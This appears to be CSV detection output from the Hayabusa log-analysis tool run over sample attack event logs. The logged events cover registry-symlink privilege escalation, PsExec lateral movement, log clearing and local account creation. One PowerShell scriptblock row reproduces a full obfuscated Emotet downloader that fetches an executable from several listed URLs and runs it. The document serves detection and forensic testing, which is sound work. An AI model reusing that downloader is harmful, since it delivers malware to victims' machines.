747F3D96-E0DA-5F44-0000-0010B3299600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:02:32.697 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\pagefile.sys | Process: C:\Windows\System32\smss.exe | PID: 308 | PGUID: 747F3D96-6039-5F45-0000-00107B2F0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:02:32.701 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\swapfile.sys | Process: C:\Windows\System32\smss.exe | PID: 308 | PGUID: 747F3D96-6039-5F45-0000-00107B2F0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:07:58.690 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89 | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:07:58.702 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\merged.gpd | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:07:58.704 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\pdc.xml | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:07:58.710 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\device_bidi.gpd | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:07:58.719 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\spool\V4Dirs\7C5CC166-44D2-46E6-93CB-3C4165330D89\5b120a24.BUD | Process: C:\Windows\System32\spoolsv.exe | PID: 2576 | PGUID: 747F3D96-E1B3-5F44-0000-001061BC0100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:05.763 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:05.770 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man.LOG1 | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:05.772 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man.LOG2 | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:05.776 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TM.blf | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:05.780 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000001.regtrans-ms | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:05.787 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\Desktop\Debug\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000002.regtrans-ms | Process: C:\Windows\Explorer.EXE | PID: 4192 | PGUID: 747F3D96-E2A0-5F44-0000-0010B5BA1B00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:37.398 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:37.401 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man.LOG1 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:37.401 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man.LOG2 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:37.401 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TM.blf | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:37.401 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000001.regtrans-ms | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:37.418 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1d-9fa5-11ea-ac3f-00155d0a720b}.TMContainer00000000000000000002.regtrans-ms | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:37.594 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1c-9fa5-11ea-ac3f-00155d0a720b}.TxR.blf | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:37.610 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man{f9a54a1c-9fa5-11ea-ac3f-00155d0a720b}.TxR.0.regtrans-ms | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:37.644 +00:00,MSEDGEWIN10,12,medium,,Registry Key Create/Delete_Sysmon Alert,contains | CreateKey: HKLM\SOFTWARE\Microsoft\DRM\DEMO2 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:37.644 +00:00,MSEDGEWIN10,13,medium,,Registry Key Value Set_Sysmon Alert,contains | SetValue: HKLM\SOFTWARE\Microsoft\DRM\DEMO2\SymbolicLinkValue: \Registry\Machine\System\CurrentControlSet\Services\ABC | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:37.677 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\ntuser.man | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:37.678 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\AppData\Local\Microsoft\CLR_v4.0 | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:37.678 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\AppData\Local\Microsoft\CLR_v4.0\UsageLogs | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:08:37.678 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\user01\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\TransactionLog.exe.log | Process: C:\Users\user01\Desktop\Debug\TransactionLog.exe | PID: 520 | PGUID: 747F3D96-E324-5F44-0000-0010AA0D4100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:09:27.981 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\pagefile.sys | Process: C:\Windows\System32\smss.exe | PID: 304 | PGUID: 747F3D96-E34B-5F44-0000-00107D2F0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-25 10:09:27.988 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\swapfile.sys | Process: C:\Windows\System32\smss.exe | PID: 304 | PGUID: 747F3D96-E34B-5F44-0000-00107D2F0000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_registry_symlink_CVE-2020-1377.evtx +2020-08-26 05:09:28.845 +00:00,DESKTOP-RIPCLIP,4104,info,,PwSh Scriptblock Log,"$Va5w3n8=(('Q'+'2h')+('w9p'+'1'));&('ne'+'w-'+'item') $eNV:teMP\WOrd\2019\ -itemtype DIrectOry;[Net.ServicePointManager]::""SecURi`T`ypRO`T`oCOL"" = ('t'+'ls'+'1'+('2, tl'+'s')+'11'+(', '+'tls'));$Depssu0 = (('D'+'yx')+('x'+'ur4g')+'x');$A74_j9r=('T'+'4'+('gf45'+'h'));$Fdkhtf_=$env:temp+(('{0}'+'word{'+'0}'+('2'+'01')+'9{0}') -F [CHAr]92)+$Depssu0+('.'+('ex'+'e'));$O39nj1p=('J6'+'9l'+('hm'+'h'));$Z8i525z=&('new-'+'obje'+'c'+'t') neT.WEbcLiENt;$Iwmfahs=(('h'+'ttp')+(':'+'//')+('q'+'u'+'anticaelectro'+'n'+'ic')+('s.com'+'/')+'w'+'p-'+'a'+('d'+'min')+'/'+'7A'+('Tr78'+'/*'+'htt')+('p'+'s:/')+('/r'+'e')+'be'+('l'+'co')+'m'+'.'+('ch/'+'pi'+'c')+('ture'+'_')+('l'+'ibra'+'ry/bbCt')+('l'+'S/')+('*ht'+'tp'+'s:/')+('/re'+'al')+'e'+'s'+('tate'+'a')+('gen'+'t')+'te'+('am.co'+'m')+'/'+('163/Q'+'T')+'d'+('/'+'*ht'+'tps:')+'//'+('w'+'ww.')+('ri'+'dd')+('hi'+'display.'+'c'+'o')+'m/'+'r'+'id'+'d'+('hi'+'/1pKY/'+'*htt')+'p'+(':'+'//')+('radi'+'osu'+'bmit.com/'+'sear')+('ch_'+'tes'+'t')+'/'+'p'+('/*'+'h')+('ttp'+':/')+'/'+('res'+'e')+'ar'+('ch'+'c')+'he'+'m'+('plu'+'s.'+'c')+('om/w'+'p-')+('a'+'dmin')+'/1'+('OC'+'C')+'/'+('*http:'+'/')+('/s'+'zymo')+('ns'+'zyp')+'er'+('sk'+'i')+('.'+'pl/a')+'ss'+('ets/'+'p')+'k/').""S`Plit""([char]42);$Zxnbryr=(('Dp'+'z9')+'4'+'a6');foreach($Mqku5a2 in $Iwmfahs){try{$Z8i525z.""d`OWN`load`FIlE""($Mqku5a2, $Fdkhtf_);$Lt8bjj7=('Ln'+('wp'+'ag')+'m');If ((.('Get-I'+'t'+'em') $Fdkhtf_).""le`NgTH"" -ge 28315) {cp (gcm calc).path $Fdkhtf_ -Force; .('Invo'+'ke'+'-Item')($Fdkhtf_);$Nfgrgu9=(('Qj6'+'bs')+'x'+'n');break;$D7ypgo1=('Bv'+('e'+'bc')+'k0')}}catch{}}$Gmk6zmk=(('Z2x'+'aaj')+'0')",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_ps_4104.evtx +2020-08-26 05:09:28.845 +00:00,DESKTOP-RIPCLIP,4104,medium,Exec,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_ps_4104.evtx +2020-08-26 05:09:33.504 +00:00,DESKTOP-RIPCLIP,1,info,,Process Created,"Cmd: ""C:\Users\Clippy\AppData\Local\Temp\word\2019\Dyxxur4gx.exe"" | Process: C:\Users\Clippy\AppData\Local\Temp\WOrd\2019\Dyxxur4gx.exe | User: DESKTOP-RIPCLIP\Clippy | Parent Cmd: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" | LID: 0x2b4c2 | PID: 7448 | PGUID: 075C05C2-EE8D-5F45-8401-000000000400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_sysmon_1.evtx +2020-08-26 05:09:33.504 +00:00,DESKTOP-RIPCLIP,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Other/emotet/exec_emotet_sysmon_1.evtx +2020-08-27 11:40:56.397 +00:00,04246w-win10.threebeesco.com,11,info,,File Created,Path: C:\Windows\PSEXESVC.exe | Process: System | PID: 4 | PGUID: B5CF5917-721E-5F46-0000-0010EB030000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-08-27 11:40:56.397 +00:00,04246w-win10.threebeesco.com,11,low,Exec,PsExec Tool Execution,,rules/sigma/file_event/file_event_win_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-08-27 11:40:56.625 +00:00,04246w-win10.threebeesco.com,1,info,,Process Created,Cmd: C:\WINDOWS\PSEXESVC.exe | Process: C:\Windows\PSEXESVC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\WINDOWS\system32\services.exe | LID: 0x3e7 | PID: 4320 | PGUID: B5CF5917-9BC8-5F47-0000-001042AB2001,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-08-27 11:40:56.625 +00:00,04246w-win10.threebeesco.com,1,low,Exec,PsExec Service Start,,rules/sigma/process_creation_sysmon/proc_creation_win_psexesvc_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-08-27 11:40:56.625 +00:00,04246w-win10.threebeesco.com,1,low,Exec,PsExec Tool Execution,,rules/sigma/process_creation_sysmon/proc_creation_win_tool_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote_file_copy_system_proc_file_write_sysmon_11.evtx +2020-09-02 11:47:39.499 +00:00,01566s-win16-ir.threebeesco.com,1102,high,Evas,Security Log Cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-02 11:47:48.570 +00:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: a-jbrown | Computer: 04246W-WIN10 | IP Addr: 172.16.66.142 | LID: 0x21a8c68,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-02 11:47:48.823 +00:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: a-jbrown | Computer: - | IP Addr: 172.16.66.142 | LID: 0x21a8c80,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-02 11:47:48.842 +00:00,01566s-win16-ir.threebeesco.com,4624,info,,Logon Type 3 - Network,User: a-jbrown | Computer: - | IP Addr: 172.16.66.142 | LID: 0x21a8c9a,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/remote task update 4624 4702 same logonid.evtx +2020-09-04 09:28:22.280 +00:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 09:28:22.280 +00:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 09:28:42.976 +00:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | DeleteKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 10:03:04.489 +00:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 10:03:04.489 +00:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 10:33:31.843 +00:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\sqlsvc | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 10:33:31.843 +00:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\sqlsvc\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 10:45:30.650 +00:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 10:45:33.802 +00:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 10:54:20.005 +00:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Account Added or Deleted from Local Administrators Group | SetValue: HKLM\SAM\SAM\Domains\Builtin\Aliases\00000220\C: Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 10:54:20.005 +00:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | DeleteKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 10:54:22.974 +00:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | CreateKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/12_RegistryKeyCreateDelete_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 10:54:22.974 +00:00,LAPTOP-JU4M3I0E,13,medium,,Registry Key Value Set_Sysmon Alert,Valid Account - Local Account Created or Deleted | SetValue: HKLM\SAM\SAM\Domains\Account\Users\Names\support\(Default): Binary Data | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 00247C92-7509-5F4E-0B00-000000002A00,rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_local_account_creation_and_added_admingroup_12_13.evtx +2020-09-04 11:00:13.713 +00:00,LAPTOP-JU4M3I0E,12,medium,,Registry Key Create/Delete_Sysmon Alert,Valid Account - Local Account Created or Deleted | DeleteKey: HKLM\SAM\SAM\Domains\Account\Users\Names\support | Process: C:\windows\system32\lsass.exe | PID: 900 | PGUID: 